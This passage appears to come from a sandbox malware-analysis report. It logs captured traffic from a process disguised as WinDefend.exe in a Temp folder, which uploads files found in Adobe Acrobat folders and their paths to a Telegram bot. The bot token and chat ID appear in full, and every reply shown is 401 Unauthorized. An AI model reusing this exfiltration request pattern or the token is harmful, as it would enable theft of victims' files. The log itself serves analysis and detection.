2024-05-23 13:35:08 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:08 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.5	61175	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:08 UTC	235	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="cb64dd65-ede1-4e21-aa17-668eb81d83aa" Host: api.telegram.org Content-Length: 164833 Expect: 100-continue
2024-05-23 13:35:08 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:08 UTC	40	OUT	Data Raw: 2d 2d 63 62 36 34 64 64 36 35 2d 65 64 65 31 2d 34 65 32 31 2d 61 61 31 37 2d 36 36 38 65 62 38 31 64 38 33 61 61 0d 0a Data Ascii: --cb64dd65-ede1-4e21-aa17-668eb81d83aa
2024-05-23 13:35:08 UTC	151	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 30 63 39 62 62 62 65 37 61 30 31 66 34 33 63 38 61 32 63 30 38 34 64 34 39 32 36 61 38 37 38 35 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 30 63 39 62 62 62 65 37 61 30 31 66 34 33 63 38 61 32 63 30 38 34 64 34 39 32 36 61 38 37 38 35 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=0c9bbbe7a01f43c8a2c084d4926a8785.png; filename*=utf-8''0c9bbbe7a01f43c8a2c084d4926a8785.png
2024-05-23 13:35:08 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 5a 00 00 02 f2 08 06 00 00 00 2b 2f 6f ea 00 00 80 00 49 44 41 54 78 da ec bd e7 77 1b c9 96 e5 ab e9 ee 0f 3d 6b a6 7b ee 2d 2b 4f 6f 01 82 04 40 07 82 de 01 84 f7 de 7b 47 4a aa ba f7 be 59 6f bd ff 7d bf d8 01 84 04 a9 64 28 1a 99 aa f3 61 2f 00 99 89 cc c8 f0 f1 8b 13 27 1e 94 4a 25 88 44 22 d1 5d a8 58 2c a2 5a ad a2 d5 6a 89 44 a2 f7 a8 d9 6c a2 5c 2e 4b 7d 21 12 89 44 22 91 48 24 12 89 44 7f 42 3d 90 48 10 89 44 77 a9 46 a3 21 40 4d 24 fa 88 6a b5 da 07 cb 0f 21 ec 5f 51 52 77 8a 44 22 91 48 24 12 89 44 22 01 ad 22 91 48 f4 8e 68 b1 d7 6e b7 05 a8 89 44 ef 11 cb 46 bd 5e d7 d6 df ef 2b 3f b9 5c 0e e9 74 fa 2f a5 6c 36 2b 75 a7 48 24 12 89 44 22 91 48 24 12 d0 fa 57 5c 16 cd 01 e1 87 06 c8 22 Data Ascii: PNGIHDRZ+/oIDATxw=k{-+Oo@{GJYo}d(a/'J%D"]X,ZjDl\.K}!D"H$DB=HDwF!@M$j!_QRwD"H$D""HhnDF^+?\t/l6+uH$D"H$W\"
2024-05-23 13:35:08 UTC	4096	OUT	Data Raw: 8e 40 eb bf 1f 45 70 90 cc a2 f1 95 57 ec 32 bd 38 c6 65 fa fd f0 c3 0f 1a f0 7d 4a 3f ff fc b3 be 96 e3 63 a6 f1 b7 02 5a c9 b1 de e7 12 82 d7 70 43 a9 6f 19 b4 9a 8d af 68 d8 65 36 93 23 67 20 bb bc 2b b7 a7 0f ae 9b 21 38 00 62 24 d1 e1 ed f4 68 a9 ed c7 c4 5d ee f8 49 d2 7d 5f 3e 5a 19 41 1c 94 31 5c 2c e4 ac 4c f8 2c 0d ce 46 70 98 30 d5 5c 6b 2a 1a ce 20 b0 f2 21 b5 36 15 d3 9d 5b b4 aa 01 6b c2 77 84 e5 b9 05 b8 4e 2e 90 2d 96 46 16 47 b4 28 2d 21 ea d9 c3 d2 cc a4 0a c7 33 cc 2c 58 70 16 4a a0 ae 0a 4e 2a 70 0c cb d2 02 16 2d cb 98 99 9e c0 c4 cc 12 d6 5d 6e ac db ad 98 51 71 ff 6c 62 06 5b 47 7e 94 ab 75 64 c2 a7 58 b1 ce e9 b8 9e 9c 50 f1 3e bf 82 c3 8b 08 6a ea 3e d1 b3 1d d8 1c 2e 24 8b 35 34 aa 79 78 0e b6 30 3b 33 a5 d2 4f a5 cb bc 15 c7 81 Data Ascii: @EpW28e}J?cZpCohe6#g +!8b$h]I}_>ZA1\,L,Fp0\k* !6[kwN.-FG(-!3,XpJN*p-]nQqlb[G~udXP>j>.$54yx0;3O
2024-05-23 13:35:08 UTC	4096	OUT	Data Raw: 5c 22 27 b9 cd b2 68 c3 53 e8 b2 8a bc 85 6c 84 63 3f b3 39 f7 b8 d8 ef e5 4a 62 1a b8 7d c8 97 eb 75 d4 28 15 e1 cf 95 f0 1f ef 6e 86 45 1f ad 3c 66 3e df 27 ed c7 35 83 9f 4e 23 c8 e5 f3 32 8e bf 23 d0 6a 8c a3 98 ff 32 99 cc 5b a2 01 15 61 26 61 2c 81 2b e1 25 8f 7d ed fe bd e1 86 1c 3f 71 c5 bb 81 ac ef f2 4e 4e 54 30 ec 34 2e b9 0d 1c be f6 66 58 8c 1c fa 85 a0 89 f0 75 45 ca cd 8a e0 3e 23 d5 b8 0a 20 48 e5 60 97 83 58 46 20 07 c3 26 72 08 6f 68 ba cc 4a 80 95 01 cf d1 b5 c0 e7 ce aa 5c 1f b4 72 63 ab 22 a2 be 53 55 d1 9d 23 9e 48 21 95 88 61 7f 7d 05 36 c7 2e 42 81 13 2c cc ce 63 eb 38 ac e3 35 70 e4 c2 92 75 63 04 5a 0f 60 5b 5b 47 38 33 04 ad c9 e0 11 16 96 d6 e0 8b e5 86 a0 35 74 8a 95 05 cb 10 b4 7a 77 b1 c2 e5 ec ea fe f1 b0 57 c3 95 45 eb 36 Data Ascii: \"'hSlc?9Jb}u(nE<f>'5N#2#j2[a&a,+%}?qNNT04.fXuE># H`XF &rohJ\rc"SU#H!a}6.B,c85pucZ`[[G835tzwWE6
2024-05-23 13:35:08 UTC	4096	OUT	Data Raw: 4b 9a 88 04 b4 0a 68 15 89 04 b4 fe 15 d4 7e bd f1 97 c4 85 80 d6 77 db 11 76 4e 8d 55 37 a1 23 c1 2b ad b7 ff cc e2 3b f2 5d f9 ce 7c 77 2e 31 13 c8 2a 12 89 44 22 91 48 f4 7d 5a d5 de cd 46 ad 22 91 80 d6 bf 1c 68 a5 e5 8d 80 56 91 48 40 ab 48 74 97 a0 d5 b4 31 c6 3d c6 5f 49 7c 67 82 66 a9 3f 45 22 91 48 24 12 89 44 22 91 80 56 91 48 24 12 d0 2a 12 dd 1a b4 fe 75 5d ba 88 15 ab 48 24 12 89 44 22 91 48 24 12 d0 2a 12 89 44 02 5a 45 22 01 ad 22 91 48 24 12 89 44 22 91 48 24 12 d0 2a 12 89 ee d2 b5 06 25 a0 55 24 12 d0 2a 12 89 44 22 91 48 24 12 89 44 7f 49 d0 5a ab d5 20 12 89 44 77 25 01 ad 22 d1 c7 41 2b cb 88 d4 15 22 91 48 24 12 89 44 22 91 48 f4 e7 d3 03 19 f8 8a 44 22 91 48 f4 e5 81 ab c4 83 48 24 12 89 44 22 91 48 24 12 fd b9 24 a0 55 24 12 89 44 Data Ascii: Kh~wvNU7#+;]\|w.1D"H}ZF"hVH@Ht1=_I\|gf?E"H$D"VH$u]H$D"H$DZE""H$D"H$%U$*D"H$DIZ Dw%"A+"H$D"HD"HH$D"H$$U$D
2024-05-23 13:35:08 UTC	4096	OUT	Data Raw: b9 69 cc 5b 9c 08 e5 ea 2a 42 3b 88 7b 77 61 99 e5 b9 45 6d 79 39 bf ec 44 30 5b 43 bf 59 c6 e1 e6 1a f6 03 69 55 89 97 70 b4 be 86 c5 f9 65 2c aa 8c b0 ba 71 8c 42 bd f5 65 9c 8b 1b d0 7a b2 09 eb d6 09 5a 83 df f1 8f df 5f e1 a5 6a 78 07 fd e1 8c 00 41 61 2e ee c7 96 d3 8e a5 e5 45 cc 4c 4f 62 6d cf a7 ad 35 33 c1 73 9c 05 62 28 16 92 d8 b6 ce e0 d9 f3 09 4c cf 5b 71 72 11 7b 6b 76 f1 ee 0a d6 10 f6 5e b8 55 58 56 5c c8 d5 7b c3 99 4c ce 80 52 84 a6 cc a4 8d 12 02 07 2e d8 54 7c 2e 5a 6c 38 f4 46 51 6f ab 46 bc 59 85 ff 68 57 75 1c 0e e1 da b4 63 7e 71 09 ae 23 af 3a d7 45 3e 72 8e 9d fd 63 e4 eb 1d 3d 8b db ae 97 70 b6 bb 85 b3 48 0e fd 41 4f c7 81 83 16 b4 0b cb d8 da f7 a0 d8 ec a2 5b 2b e0 6c 7f 17 67 de 13 6c ad 6f e0 d0 17 47 cc bb 8f 85 e9 e7 78 Data Ascii: i[*B;{waEmy9D0[CYiUpe,qBezZ_jxAa.ELObm53sb(L[qr{kv^UXV\{LR.T\|.Zl8FQoFYhWuc~q#:E>rc=pHAO[+lgloGx
2024-05-23 13:35:08 UTC	4096	OUT	Data Raw: 7f 0c e5 5a 73 64 54 d3 41 b7 ad c6 75 6a 9c 35 3d a7 c6 5f 9e 20 82 17 c7 b0 ce cf 60 95 96 a9 6a 4c eb e5 ca c5 03 ff 7b 41 6b bf 51 50 e3 36 35 36 b7 6d 23 94 2a a2 98 09 61 75 61 06 56 e7 3e 82 e1 90 1a bf 39 30 33 b3 0c 5f ba aa 5d fb ad cd 4f 63 d9 b1 87 40 28 84 b3 dd 75 4c 4f 2f ab 31 7a 05 ed 62 5c 8d 35 a7 b1 75 12 42 26 1e c1 a1 47 c5 47 3c 8e 53 d7 1a e6 ad 4e 24 2b 1d f4 ae 69 30 65 5c 08 90 6b d0 32 94 c0 88 90 90 bf 09 09 09 6e c8 3b 08 65 68 b9 47 03 b3 4f 01 c2 bb 04 ad c6 e7 25 81 20 41 2b 5d 36 9a 4d b0 78 9c c6 6f 84 45 04 5f dc 95 9e 00 f3 be 40 ab 79 0f 02 40 5a 0c 12 6c 11 aa f1 d9 84 57 64 44 0c 0f c1 20 c3 49 c0 45 4e c4 30 71 85 34 8f f3 7f b4 d8 bc 6b 00 47 6e 43 58 c6 77 67 7a 31 de 0c 34 e5 71 c2 48 c2 60 86 83 a2 25 23 0d 06 Data Ascii: ZsdTAuj5=_ `jL{AkQP656m#*auaV>903_]Oc@(uLO/1zb\5uB&GG<SN$+i0e\k2n;ehGO% A+]6MxoE_@y@ZlWdD IEN0q4kGnCXwgz14qH`%#
2024-05-23 13:35:08 UTC	4096	OUT	Data Raw: 65 11 ad 00 80 68 05 44 2b 00 00 00 00 00 20 5a e1 93 10 ad 36 cd 5c c2 f8 f8 b8 5e bc 78 e1 e8 eb eb 7b 88 6c 7d 5f d1 6a cb d9 7d ed d6 d6 96 7a 7b 7b d5 de de ae 8e 8e 8e b7 62 f3 8c b1 b1 31 b7 9f f7 bd 1f 46 b4 02 00 a2 15 10 ad 00 00 00 00 00 80 68 85 47 17 ad f6 de a2 48 4d b2 d6 d5 d5 69 62 62 42 8b 8b 8b 4e b6 9a 14 b5 c8 d6 da 9c ad ef 22 5a 2d 32 d5 d6 69 6d 6d 75 98 44 1d 1d 1d 7d 2b 36 2f 16 8b 3d d4 c5 d6 b7 54 02 ef 1a dd fa bb 8a 56 af e8 85 70 21 01 40 b4 02 a2 15 00 00 00 00 00 10 ad 88 d6 cf 5d b4 da e7 f5 f5 75 27 36 2d 6d 80 39 05 4b 19 30 3f 3f ef a6 c5 e3 f1 f7 16 ad e5 72 59 89 44 c2 c9 db b5 b5 35 55 2a 15 b7 ee db 30 a9 6a fb ef ef ef 57 57 57 97 bb 37 36 ac 0e ef 72 6f fc e8 a2 d5 f7 03 05 0f c9 65 83 b0 11 d1 97 c7 57 29 6c 78 Data Ascii: ehD+ Z6\^x{l}_j}z{{b1FhGHMibbBN"Z-2immuD}+6/=TVp!@]u'6-m9K0??rYD5U*0jWWW76roeW)lx
2024-05-23 13:35:08 UTC	4096	OUT	Data Raw: d6 67 29 dc e6 e6 ee b1 b2 05 cf c9 56 ab d3 f5 d5 99 b6 c3 fd 2d 2e 2d 69 63 67 5f d9 bc ef e6 59 bf 79 d6 ce dd 4d ad b8 76 ae 69 cd 6d 77 55 7b 27 29 79 26 44 c3 be 3b 3d d8 d6 f2 52 38 7f 23 a1 73 ab 47 e0 ff e0 18 f8 5e 41 e7 c7 61 1d c2 b6 2c 85 1c 9e 5d 39 c9 6c fd b9 bb 7f a2 eb 82 e7 24 6d 10 14 75 99 3c d0 c6 5a b8 9f b0 3e 2b ab db 61 bf 17 c2 79 f9 b0 4f 37 b4 11 d6 3d ef 05 4e 8a 5f 26 8f b4 77 78 aa dc 07 b2 fc 80 68 05 44 2b 00 00 00 00 00 00 a2 15 d1 fa a1 45 6b 35 90 f1 fb 28 d6 1f 3b df aa c1 8d 1f ee 1e f8 51 44 ab 45 3d 9e 6e ce 69 60 78 5a 97 c5 8a 82 f4 91 7a 5a eb 54 d7 39 aa 64 ae ac bb 72 4e 2b 13 83 8a 2f ed ca 0f 0a 5a 1a 1f d4 e8 ec a6 0a a5 8a 2a 95 40 67 db 0b ea 1b 9c d0 d9 75 51 27 eb d3 1a 1a 5f d0 55 a1 a8 d4 e9 a1 76 36 Data Ascii: g)V-.-icg_YyMvimwU{')y&D;=R8#sG^Aa,]9l$mu<Z>+ayO7=N_&wxhD+Ek5(;QDE=ni`xZzZT9drN+/Z*@guQ'_Uv6
2024-05-23 13:35:09 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:08 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.5	61176	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:08 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 191 Expect: 100-continue
2024-05-23 13:35:08 UTC	191	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 6c 61 72 67 65 5f 74 72 65 66 6f 69 6c 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 6c 61 72 67 65 5f 74 72 65 66 6f 69 6c 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 31 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+large_trefoil.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5Clarge_trefoil.png%0ASize%3A+1+KB
2024-05-23 13:35:08 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:09 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:08 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.5	61177	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:09 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="847624d9-3cac-4013-b309-bdd6a29197ef" Host: api.telegram.org Content-Length: 2626 Expect: 100-continue
2024-05-23 13:35:09 UTC	40	OUT	Data Raw: 2d 2d 38 34 37 36 32 34 64 39 2d 33 63 61 63 2d 34 30 31 33 2d 62 33 30 39 2d 62 64 64 36 61 32 39 31 39 37 65 66 0d 0a Data Ascii: --847624d9-3cac-4013-b309-bdd6a29197ef
2024-05-23 13:35:09 UTC	93	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 31 32 38 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 31 32 38 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=128.png; filename*=utf-8''128.png
2024-05-23 13:35:09 UTC	2308	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 06 00 00 00 c3 3e 61 cb 00 00 08 cb 49 44 41 54 78 9c ed 9d 5f 88 1d 57 19 c0 7f df 39 73 ef dd dd 6c 56 93 b8 31 0a 22 46 a1 41 63 ac 55 52 c4 87 46 44 91 a2 6d 5a 49 68 11 f3 ac d8 17 05 5b 11 d2 6c d5 3e 34 7d b5 c1 27 1f 52 8b 21 8b 10 6d 50 54 a4 5b c1 07 17 1a da 54 8b d2 50 fc df ea 9a a6 c6 dd 4d 72 ef 9d f3 f9 30 77 6e 6e 68 1b 73 77 67 ee 9d b3 f3 fd 60 c9 c0 b2 73 fe fd ce 77 ce 99 39 73 02 86 61 18 46 4d 91 91 a6 75 12 07 07 60 76 69 94 e9 16 ca 3e 60 e1 d8 82 32 4f 3a ee bc c4 81 8e 54 b2 51 b2 21 ca 55 6e 21 14 41 50 80 0f 3e 71 f7 ce a6 e7 33 a0 ef 05 b7 43 84 96 06 55 11 89 a6 22 55 43 48 26 9b ee fc df 5e 7d ea dc 7d bf 7c 6c b0 7c b1 92 94 76 e7 5e e5 ec fe fe 9d Data Ascii: PNGIHDR>aIDATx_W9slV1"FAcURFDmZIh[l>4}'R!mPT[TPMr0wnnhswg`sw9saFMu`vi>`2O:TQ!Un!AP>q3CU"UCH&^}}\|l\|v^
2024-05-23 13:35:09 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 38 34 37 36 32 34 64 39 2d 33 63 61 63 2d 34 30 31 33 2d 62 33 30 39 2d 62 64 64 36 61 32 39 31 39 37 65 66 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --847624d9-3cac-4013-b309-bdd6a29197efContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:09 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:09 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 38 34 37 36 32 34 64 39 2d 33 63 61 63 2d 34 30 31 33 2d 62 33 30 39 2d 62 64 64 36 61 32 39 31 39 37 65 66 2d 2d 0d 0a Data Ascii: --847624d9-3cac-4013-b309-bdd6a29197ef--
2024-05-23 13:35:09 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:10 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:09 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.5	61178	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:09 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="6fc179b3-179f-42eb-bb89-5be8323bca03" Host: api.telegram.org Content-Length: 2358 Expect: 100-continue
2024-05-23 13:35:10 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:10 UTC	40	OUT	Data Raw: 2d 2d 36 66 63 31 37 39 62 33 2d 31 37 39 66 2d 34 32 65 62 2d 62 62 38 39 2d 35 62 65 38 33 32 33 62 63 61 30 33 0d 0a Data Ascii: --6fc179b3-179f-42eb-bb89-5be8323bca03
2024-05-23 13:35:10 UTC	113	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 6c 61 72 67 65 5f 74 72 65 66 6f 69 6c 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 6c 61 72 67 65 5f 74 72 65 66 6f 69 6c 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=large_trefoil.png; filename*=utf-8''large_trefoil.png
2024-05-23 13:35:10 UTC	2020	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 7d 00 00 00 7d 08 06 00 00 00 8f 80 6c 25 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 07 86 49 44 41 54 78 da ec 9d cf 75 ea 38 14 c6 e5 9c b7 1f a6 82 71 56 b3 98 45 48 05 81 0a 42 2a 08 54 10 a8 80 47 05 90 0a 20 15 84 54 80 53 41 9c c5 2c 66 15 a6 03 97 30 56 ce d5 44 d1 b3 75 65 30 89 25 7d df 39 3e 24 c6 84 e0 9f ef 5f c9 42 08 08 82 20 08 82 20 08 82 20 08 82 ba a2 24 c4 0f f5 77 fa 67 af 7c 18 95 5b aa ed de 97 5b f6 d7 fe 9f 3d a0 87 07 5c c2 5e 97 5b af e6 90 4d b9 2d 62 86 9f 04 06 7c 59 3e 4c b5 5d 79 b9 15 e5 d6 37 2e 02 b9 6f 58 82 cf 01 dd 7f 0b 7f d4 60 df e8 d6 5c 3e ff b3 7c 98 03 bc 10 67 01 7d 96 a5 16 bb 87 Data Ascii: PNGIHDR}}l%tEXtSoftwareAdobe ImageReadyqe<IDATxu8qVEHB*TG TSA,f0VDue0%}9>$_B $wg\|[[=\^[M-b\|Y>L]y7.oX`\>\|g}
2024-05-23 13:35:10 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 36 66 63 31 37 39 62 33 2d 31 37 39 66 2d 34 32 65 62 2d 62 62 38 39 2d 35 62 65 38 33 32 33 62 63 61 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --6fc179b3-179f-42eb-bb89-5be8323bca03Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:10 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:10 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 36 66 63 31 37 39 62 33 2d 31 37 39 66 2d 34 32 65 62 2d 62 62 38 39 2d 35 62 65 38 33 32 33 62 63 61 30 33 2d 2d 0d 0a Data Ascii: --6fc179b3-179f-42eb-bb89-5be8323bca03--
2024-05-23 13:35:10 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:10 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.5	61179	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:09 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 257 Expect: 100-continue
2024-05-23 13:35:10 UTC	257	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 31 37 39 66 31 33 35 61 62 39 38 64 30 31 35 39 36 35 35 37 31 61 33 64 35 38 35 66 38 63 38 66 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 61 70 70 31 25 35 43 64 63 2d 64 65 73 6b 74 6f 70 2d 61 70 70 2d 64 72 6f 70 69 6e 25 35 43 31 2e 30 2e 30 5f 31 2e 30 2e 30 25 35 43 31 37 39 66 31 33 35 61 62 39 38 64 30 31 35 39 36 35 35 37 31 61 33 64 35 38 35 66 38 63 38 66 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 36 33 2b Data Ascii: chat_id=1655240967&text=File%3A+179f135ab98d015965571a3d585f8c8f.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Capp1%5Cdc-desktop-app-dropin%5C1.0.0_1.0.0%5C179f135ab98d015965571a3d585f8c8f.png%0ASize%3A+63+
2024-05-23 13:35:10 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:10 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:10 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.5	61180	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:10 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 349 Expect: 100-continue
2024-05-23 13:35:11 UTC	25	IN	HTTP/1.1 100 Continue
